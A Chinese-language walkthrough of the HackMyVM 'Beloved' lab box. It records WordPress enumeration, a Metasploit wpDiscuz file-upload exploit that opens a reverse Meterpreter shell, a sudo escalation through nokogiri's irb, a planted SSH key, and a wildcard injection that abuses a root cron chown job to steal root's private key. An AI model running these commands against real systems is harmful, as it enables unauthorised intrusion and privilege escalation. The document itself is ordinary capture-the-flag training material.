HMV Beloved

信息收集

IP=192.168.0.162
nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-16 02:28 EDT
Nmap scan report for 192.168.0.162
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2E:80:60 (Oracle VirtualBox virtual NIC)

网站

打开看到 Title ，应该是 WordPress 网站，但是看起来 css 都丢了。看网络请求：http://beloved/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
应该是要加个 hosts。加了之后看起来舒服多了。

先不用扫目录了，直接 WPScan 扫描。

wpscan --url http://beloved/  --plugins-detection aggressive -e u,ap --api-token $WPSCAN_API_TOKEN
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://beloved/ [192.168.0.162]
[+] Started: Wed Oct 16 02:37:10 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://beloved/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://beloved/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://beloved/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://beloved/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://beloved/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:09 <==============> (702 / 702) 100.00% Time: 00:00:09
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentyone
 | Location: http://beloved/wp-content/themes/twentytwentyone/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://beloved/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://beloved/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://beloved/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 01:01:08 <=========> (107337 / 107337) 100.00% Time: 01:01:08
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://beloved/wp-content/plugins/akismet/
 | Latest Version: 5.3.3
 | Last Updated: 2024-08-05T14:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://beloved/wp-content/plugins/akismet/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
 |      - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
 |      - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
 |
 | The version could not be determined.

[+] feed
 | Location: http://beloved/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://beloved/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wpdiscuz
 | Location: http://beloved/wp-content/plugins/wpdiscuz/
 | Last Updated: 2024-10-14T17:02:00.000Z
 | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
 | [!] The version is out of date, the latest version is 7.6.27
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
 |
 | [!] 18 vulnerabilities identified:
 |
 | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
 |     Fixed in: 7.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
 |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
 |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
 |
 | [!] Title: Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting
 |     Fixed in: 7.3.2
 |     References:
 |      - https://wpscan.com/vulnerability/f51a350c-c46d-4d52-b787-762283625d0b
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24737
 |
 | [!] Title: wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF
 |     Fixed in: 7.3.4
 |     References:
 |      - https://wpscan.com/vulnerability/2746101e-e993-42b9-bd6f-dfd5544fa3fe
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24806
 |      - https://www.youtube.com/watch?v=CL7Bttu2W-o
 |
 | [!] Title: wpDiscuz < 7.3.12 - Sensitive Information Disclosure
 |     Fixed in: 7.3.12
 |     References:
 |      - https://wpscan.com/vulnerability/027e6ef8-39d8-4fa9-957f-f53ee7175c0a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23984
 |
 | [!] Title: wpDiscuz < 7.6.4 - Unauthenticated Data Modification via IDOR
 |     Fixed in: 7.6.4
 |     References:
 |      - https://wpscan.com/vulnerability/d7de195a-a932-43dd-bbb4-784a19324b04
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3869
 |
 | [!] Title: wpDiscuz < 7.6.4 - Post Rating Increase/Decrease iva IDOR
 |     Fixed in: 7.6.4
 |     References:
 |      - https://wpscan.com/vulnerability/051ab8b8-210e-48ac-82e7-7c4a0aa2ecd5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3998
 |
 | [!] Title: wpDiscuz < 7.6.12 - Unauthenticated Stored XSS
 |     Fixed in: 7.6.12
 |     References:
 |      - https://wpscan.com/vulnerability/f061ffa4-25f2-4ad5-9edb-6cb2c7b678d1
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47185
 |
 | [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
 |     Fixed in: 7.6.6
 |     Reference: https://wpscan.com/vulnerability/ebb5ed9a-4fb2-4d64-a8f2-6957878a4599
 |
 | [!] Title: wpDiscuz < 7.6.4 - Author+ IDOR
 |     Fixed in: 7.6.4
 |     References:
 |      - https://wpscan.com/vulnerability/d5e677ef-786f-4921-97d9-cbf0c2e21df9
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46311
 |
 | [!] Title: wpDiscuz < 7.6.11 - Unauthenticated Content Injection
 |     Fixed in: 7.6.11
 |     References:
 |      - https://wpscan.com/vulnerability/8c8cabee-285a-408f-9449-7bb545c07cdc
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46310
 |
 | [!] Title: wpDiscuz < 7.6.11 - Insufficient Authorization to Comment Submission on Deleted Posts
 |     Fixed in: 7.6.11
 |     References:
 |      - https://wpscan.com/vulnerability/874679f2-bf44-4c11-bc3b-69ae5ac59ced
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46309
 |
 | [!] Title: wpDiscuz < 7.6.12 - Missing Authorization in AJAX Actions
 |     Fixed in: 7.6.12
 |     References:
 |      - https://wpscan.com/vulnerability/2e121d4f-7fdf-428c-8251-a586cbd31a96
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45760
 |
 | [!] Title: wpDiscuz < 7.6.12 - Cross-Site Request Forgery
 |     Fixed in: 7.6.12
 |     References:
 |      - https://wpscan.com/vulnerability/f8dfcc13-187c-4a83-a87e-761c0db4b6d9
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47775
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/53af9dfd-eb2d-4f6f-b02f-daf790b95f1f
 |
 | [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
 |     Fixed in: 7.6.6
 |     References:
 |      - https://wpscan.com/vulnerability/a2fec175-40f6-4a80-84ed-5b88251584de
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd1e52c-83b7-4b3e-a791-a2c0ccd856bc
 |
 | [!] Title: wpDiscuz < 7.6.13 - Admin+ Stored XSS
 |     Fixed in: 7.6.13
 |     References:
 |      - https://wpscan.com/vulnerability/79aed6a7-a6e2-4429-8f98-ccac6b59fb4d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51691
 |      - https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-12-cross-site-scripting-xss-vulnerability
 |
 | [!] Title: wpDiscuz < 7.6.16 - Authenticated (Author+) Stored Cross-Site Scripting via Uploaded Image Alternative Text
 |     Fixed in: 7.6.16
 |     References:
 |      - https://wpscan.com/vulnerability/f3a337ae-54e5-41ca-a0d9-60745b568469
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2477
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eddc03d-ecff-4b50-a574-7b6b62e53af0
 |
 | [!] Title: Comments – wpDiscuz < 7.6.19 - Authenticated (Contributor+) Stored Cross-Site Scripting
 |     Fixed in: 7.6.19
 |     References:
 |      - https://wpscan.com/vulnerability/607da7a6-c2f2-4a9e-9471-8e0d29f355d9
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-35681
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/005bf2f0-892f-4248-afe3-263ae3d2ac54
 |
 | [!] Title: Comments – wpDiscuz < 7.6.22 - Unauthenticated HTML Injection
 |     Fixed in: 7.6.22
 |     References:
 |      - https://wpscan.com/vulnerability/66542876-77ae-442d-acde-2aac642f1d36
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6704
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa3501a4-7975-4f90-8037-f8a06c293c07
 |
 | Version: 7.0.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://beloved/wp-content/plugins/wpdiscuz/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] smart_ass
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://beloved/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Sitemap (Aggressive Detection)
 |   - http://beloved/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 21

[+] Finished: Wed Oct 16 03:39:41 2024
[+] Requests Done: 108083
[+] Cached Requests: 616
[+] Data Sent: 22.73 MB
[+] Data Received: 29.813 MB
[+] Memory used: 484.352 MB
[+] Elapsed time: 01:02:30

搞了一个多小时才跑完，看起来应该可以用 wpDiscuz 来搞 RCE。 msfconsole 搞起。

渗透

msf6 > search wpdiscuz

Matching Modules
================

   #  Name                                                         Disclosure Date  Rank       Check  Description
   -  ----                                                         ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload  2020-02-21       excellent  Yes    WordPress wpDiscuz Unauthenticated File Upload Vulnerability


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp

msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > options

Module options (exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BLOGPATH                    yes       Link to the post [/index.php/2020/12/12/post1]
   Proxies                     no        A proxy chain of format type:host:port[,type:host:po
                                         rt][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/
                                         docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   wpDiscuz < 7.0.5



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set RHOSTS 192.168.0.162
RHOSTS => 192.168.0.162
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set BLOGPATH 2021/06/09/hello-world/

msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set LHOST 192.168.0.30
LHOST => 192.168.0.30
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set LPORT 1234
LPORT => 1234

msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > run

[*] Started reverse TCP handler on 192.168.0.30:1234
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Payload uploaded as EfICGvsPji.php
[*] Calling payload...
[*] Sending stage (39927 bytes) to 192.168.0.162
[*] Meterpreter session 3 opened (192.168.0.30:1234 -> 192.168.0.162:48808) at 2024-10-16 04:02:04 -0400
[!] This exploit may require manual cleanup of 'EfICGvsPji.php' on the target

meterpreter > shell

Process 1328 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@beloved:/var/www/html/wordpress/wp-content/uploads/2024/10$

提权 beloved

sudo -l
Matching Defaults entries for www-data on beloved:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on beloved:
    (beloved) NOPASSWD: /usr/local/bin/nokogiri

搜了下，

nokogiri 是一个用于处理 XML 和 HTML 的 Ruby 库，提供易于理解的 API 进行文档的读取、写入、修改和查询。它依赖于 libxml2、libgumbo 和 xerces 等本地解析器，确保了速度和标准的遵循。

看了下这个文件：

#!/usr/bin/ruby2.5
#
# This file was generated by RubyGems.
#
# The application 'nokogiri' is installed as part of a gem, and
# this file is here to facilitate running it.
#

require 'rubygems'

version = ">= 0.a"

if ARGV.first
  str = ARGV.first
  str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding
  if str =~ /\A_(.*)_\z/ and Gem::Version.correct?($1) then
    version = $1
    ARGV.shift
  end
end

if Gem.respond_to?(:activate_bin_path)
load Gem.activate_bin_path('nokogiri', 'nokogiri', version)
else
gem "nokogiri", version
load Gem.bin_path("nokogiri", "nokogiri", version)
end

www-data@beloved:/var/www$ sudo -u beloved  /usr/local/bin/nokogiri
sudo -u beloved  /usr/local/bin/nokogiri
Nokogiri: an HTML, XML, SAX, and Reader parser
Usage: nokogiri <uri|path> [options]

Examples:
  nokogiri https://www.ruby-lang.org/
  nokogiri ./public/index.html
  curl -s http://www.nokogiri.org | nokogiri -e'p $_.css("h1").length'

Options:
        --type type                  Parse as type: xml or html (default: auto)
    -C file                          Specifies initialization file to load (default /home/beloved/.nokogirirc)
    -E, --encoding encoding          Read as encoding (default: none)
    -e command                       Specifies script from command-line.
        --rng <uri|path>             Validate using this rng file.
    -?, --help                       Show this message
    -v, --version                    Show version


www-data@beloved:/var/www$ sudo -u beloved  /usr/local/bin/nokogiri /etc/passwd
<udo -u beloved  /usr/local/bin/nokogiri /etc/passwd
Your document is stored in @doc...
irb(main):001:0>

本来想试试读个文件，没想到，竟然进入到 ruby 的 irb 了。直接提权。

irb(main):001:0> system("bash")
system("bash")
beloved@beloved:/var/www$ id
id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)

提权 root

上来试了 sudo -l 发现没密码。

ssh beloved@$IP
The authenticity of host '192.168.0.162 (192.168.0.162)' can't be established.
ED25519 key fingerprint is SHA256:2b+kTRKlx4qeMsfce+AHPgi/ReUzFfLnFbNEPBAg4uk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.162' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).

应该可以用 publickey 登录。

echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHfCDu2jQ2p+CQXLFi3vFOS0oaW8L2Fk+JDysKeJA5UU root@kali' > authorized_keys

直接 ssh 过来吧，比较方便。msf 里的 shell 比较难受。

ssh beloved@$IP
beloved@beloved:~$ id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
wget 192.168.0.30:8000/pspy64
beloved@beloved:~$ chmod +x pspy64
beloved@beloved:~$ ./pspy64
# 找到了一个 定时任务
2024/10/16 10:33:01 CMD: UID=0     PID=1621   | /bin/sh -c cd /opt && chown root:root *

beloved@beloved:~$ cd /opt
beloved@beloved:/opt$ ls
id_rsa
beloved@beloved:/opt$ cat id_rsa
cat: id_rsa: Permission denied
beloved@beloved:/opt$ ls -al
total 12
drwxrwx---  2 root beloved 4096 Jun 27  2021 .
drwxr-xr-x 18 root root    4096 May 19  2021 ..
-rw-------  1 root root    1823 Jun 27  2021 id_rsa

看起来这个 id_rsa 是 root 的，但是权限不够。应该就是 chown root:root * 这段，看见这个 * 就有点感觉。

/opt目录我们是有写入权限的，所以理论上可以利用 chown 的 --reference 参数来修改文件的权限。 再加上 * 就可以注入到 chown 这个命令里了：

beloved@beloved:/opt$ touch 1
beloved@beloved:/opt$ ls -al
total 12
drwxrwx---  2 root    beloved 4096 Oct 16 10:39 .
drwxr-xr-x 18 root    root    4096 May 19  2021 ..
-rw-r--r--  1 beloved beloved    0 Oct 16 10:39 1
-rw-------  1 root    root    1823 Jun 27  2021 id_rsa
beloved@beloved:/opt$ touch --reference=1
touch: missing file operand
Try 'touch --help' for more information.
beloved@beloved:/opt$ touch -- --reference=1
# 等执行定时任务
beloved@beloved:/opt$ ls -al
total 12
drwxrwx---  2 root    beloved 4096 Oct 16 10:39  .
drwxr-xr-x 18 root    root    4096 May 19  2021  ..
-rw-r--r--  1 beloved beloved    0 Oct 16 10:39  1
-rw-------  1 beloved beloved 1823 Jun 27  2021  id_rsa
-rw-r--r--  1 beloved beloved    0 Oct 16 10:39 '--reference=1'

可以看到 id_rsa 已经被改成了 beloved 的权限了。

chmod 600 id
ssh -i id root@$IP
Linux beloved 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 27 17:47:28 2021 from 192.168.0.28
root@beloved:~# id
uid=0(root) gid=0(root) groups=0(root)

完结撒花。🎉